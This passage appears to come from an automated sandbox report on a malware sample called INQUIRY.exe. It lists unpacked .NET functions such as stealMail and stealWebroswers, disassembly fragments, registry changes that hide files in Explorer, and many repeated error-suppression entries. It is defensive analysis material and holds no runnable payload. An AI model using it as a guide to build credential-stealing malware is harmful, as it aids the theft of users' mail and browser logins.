                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004414DC SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,0_2_004414DC
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004414DC SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,0_2_004414DC
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00441B28 push 00441BB5h; ret 0_2_00441BAD
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0040C020 push 0040C098h; ret 0_2_0040C090
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00430030 push 0043005Ch; ret 0_2_00430054
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0040C09A push 0040C10Bh; ret 0_2_0040C103
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0040C09C push 0040C10Bh; ret 0_2_0040C103
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0040C17A push 0040C1A8h; ret 0_2_0040C1A0
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0040C17C push 0040C1A8h; ret 0_2_0040C1A0
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00430198 push 004301C4h; ret 0_2_004301BC
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004101B0 push 00410211h; ret 0_2_00410209
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00410214 push 00410415h; ret 0_2_0041040D
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0040C2A4 push eax; retn 0040h0_2_0040C2B9
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004583D8 push 00458404h; ret 0_2_004583FC
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00410418 push 0041055Ch; ret 0_2_00410554
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00426524 push 004265F4h; ret 0_2_004265EC
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00410530 push 0041055Ch; ret 0_2_00410554
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0046A5E4 push ecx; mov dword ptr [esp], ecx0_2_0046A5E8
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0040659E push 004065F1h; ret 0_2_004065E9
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004065A0 push 004065F1h; ret 0_2_004065E9
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0041C6E4 push ecx; mov dword ptr [esp], edx0_2_0041C6E9
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00406770 push 0040679Ch; ret 0_2_00406794
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00426704 push 00426730h; ret 0_2_00426728
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004667D8 push 00466804h; ret 0_2_004667FC
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004627D8 push ecx; mov dword ptr [esp], ecx0_2_004627DD
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0040682C push 00406858h; ret 0_2_00406850
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0046A8F4 push 0046A91Ah; ret 0_2_0046A912
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0046A958 push 0046A984h; ret 0_2_0046A97C
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0041A978 push ecx; mov dword ptr [esp], edx0_2_0041A97A
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004269BC push 004269E8h; ret 0_2_004269E0
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00428A50 push 00428A7Ch; ret 0_2_00428A74
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00444A7C push 00444AA8h; ret 0_2_00444AA0
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00428A04 push 00428A45h; ret 0_2_00428A3D
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00441B28 push 00441BB5h; ret 0_2_00441BAD
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0040C020 push 0040C098h; ret 0_2_0040C090
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00430030 push 0043005Ch; ret 0_2_00430054
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0040C09A push 0040C10Bh; ret 0_2_0040C103
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0040C09C push 0040C10Bh; ret 0_2_0040C103
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0040C17A push 0040C1A8h; ret 0_2_0040C1A0
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0040C17C push 0040C1A8h; ret 0_2_0040C1A0
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00430198 push 004301C4h; ret 0_2_004301BC
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004101B0 push 00410211h; ret 0_2_00410209
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00410214 push 00410415h; ret 0_2_0041040D
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0040C2A4 push eax; retn 0040h0_2_0040C2B9
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004583D8 push 00458404h; ret 0_2_004583FC
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00410418 push 0041055Ch; ret 0_2_00410554
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00426524 push 004265F4h; ret 0_2_004265EC
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00410530 push 0041055Ch; ret 0_2_00410554
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0046A5E4 push ecx; mov dword ptr [esp], ecx0_2_0046A5E8
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0040659E push 004065F1h; ret 0_2_004065E9
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004065A0 push 004065F1h; ret 0_2_004065E9
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0041C6E4 push ecx; mov dword ptr [esp], edx0_2_0041C6E9
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00406770 push 0040679Ch; ret 0_2_00406794
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00426704 push 00426730h; ret 0_2_00426728
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004667D8 push 00466804h; ret 0_2_004667FC
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004627D8 push ecx; mov dword ptr [esp], ecx0_2_004627DD
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0040682C push 00406858h; ret 0_2_00406850
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0046A8F4 push 0046A91Ah; ret 0_2_0046A912
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0046A958 push 0046A984h; ret 0_2_0046A97C
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0041A978 push ecx; mov dword ptr [esp], edx0_2_0041A97A
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004269BC push 004269E8h; ret 0_2_004269E0
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00428A50 push 00428A7Ch; ret 0_2_00428A74
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00444A7C push 00444AA8h; ret 0_2_00444AA0
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00428A04 push 00428A45h; ret 0_2_00428A3D

                    Hooking and other Techniques for Hiding and Protection:

                    barindex
                    Changes the view of files in windows explorer (hidden files and folders)Show sources
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced HiddenJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced HiddenJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00455880 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,0_2_00455880
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00456024 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,0_2_00456024
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0043C658 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,0_2_0043C658
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00452974 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,0_2_00452974
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0043CF3C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,0_2_0043CF3C
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00427418 IsIconic,GetWindowPlacement,GetWindowRect,0_2_00427418
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0043BDB0 IsIconic,GetCapture,0_2_0043BDB0
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00455F74 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,0_2_00455F74
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00455880 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,0_2_00455880
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00456024 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,0_2_00456024
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0043C658 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,0_2_0043C658
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00452974 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,0_2_00452974
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0043CF3C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,0_2_0043CF3C
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00427418 IsIconic,GetWindowPlacement,GetWindowRect,0_2_00427418
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_0043BDB0 IsIconic,GetCapture,0_2_0043BDB0
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00455F74 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,0_2_00455F74
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_00455880 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,2_2_00455880
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_00456024 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,2_2_00456024
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_0043C658 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,2_2_0043C658
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_00452974 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,2_2_00452974
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_0043CF3C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,2_2_0043CF3C
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_00427418 IsIconic,GetWindowPlacement,GetWindowRect,2_2_00427418
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_0043BDB0 IsIconic,GetCapture,2_2_0043BDB0
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_00455F74 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,2_2_00455F74
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004414DC SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,0_2_004414DC
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004414DC SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,0_2_004414DC
                    Source: C:\Users\user\Desktop\INQUIRY.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Users\user\Desktop\INQUIRY.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363} DeviceTicketJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363} DeviceTicketJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
